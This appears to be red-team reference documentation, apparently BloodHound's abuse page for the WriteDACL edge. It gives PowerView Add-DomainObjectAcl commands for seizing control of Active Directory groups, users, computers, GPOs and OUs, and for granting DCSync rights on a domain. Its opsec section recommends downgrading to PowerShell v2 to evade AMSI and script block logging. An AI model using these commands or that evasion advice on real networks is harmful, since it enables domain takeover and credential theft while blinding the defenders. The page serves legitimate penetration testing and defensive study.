With write access to the target object’s DACL, you can grant yourself any privilege you want on the object.
Abuse Info
With the ability to modify the DACL on the target object, you can grant yourself almost any privilege against the object you wish.
Groups
With WriteDACL over a group, grant yourself the right to add members to the group:
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights WriteMembers
See the abuse info for AddMembers edge for more information about execution the attack from there.
Users
With WriteDACL over a user, grant yourself full control of the user object:
Add-DomainObjectAcl -TargetIdentity harmj0y -Rights All
See the abuse info for GenericAll over a user for more information about how to continue from there.
Computers
With WriteDACL over a computer object, grant yourself full control of the computer object:
Add-DomainObjectAcl -TargetIdentity windows1 -Rights All
See the abuse info for GenericAll over a computer for more information about how to continue from there.
Domains
With WriteDACL against a domain object, grant yourself the ability to DCSync:
Add-DomainObjectAcl -TargetIdentity testlab.local -Rights DCSync
Then perform the DCSync attack.
GPOs
With WriteDACL over a GPO, grant yourself full control of the GPO:
Add-DomainObjectAcl -TargetIdentity TestGPO -Rights All
Then edit the GPO to take over an object the GPO applies to.
OUs
With WriteDACL over an OU, grant yourself full control of the OU:
Add-DomainObjectAcl -TargetIdentity (OU GUID) -Rights All
Then add a new ACE to the OU that inherits down to child objects to take over those child objects.
Opsec Considerations
When using the PowerView functions, keep in mind that PowerShell v5 introduced several security mechanisms that make it much easier for defenders to see what’s going on with PowerShell in their network, such as script block logging and AMSI. You can bypass those security mechanisms by downgrading to PowerShell v2, which all PowerView functions support.
Modifying permissions on an object will generate 4670 and 4662 events on the domain controller that handled the request.
Additional opsec considerations depend on the target object and how to take advantage of this privilege.
References
- https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
- https://www.youtube.com/watch?v=z8thoG7gPd0
- https://eladshamir.com/2019/01/28/Wagging-the-Dog.html
- https://github.com/GhostPack/Rubeus#s4u
- https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff
- https://blog.harmj0y.net/redteaming/another-word-on-delegation/
- https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
- https://github.com/Kevin-Robertson/Powermad#new-machineaccount
- https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=netframework-4.8
Updated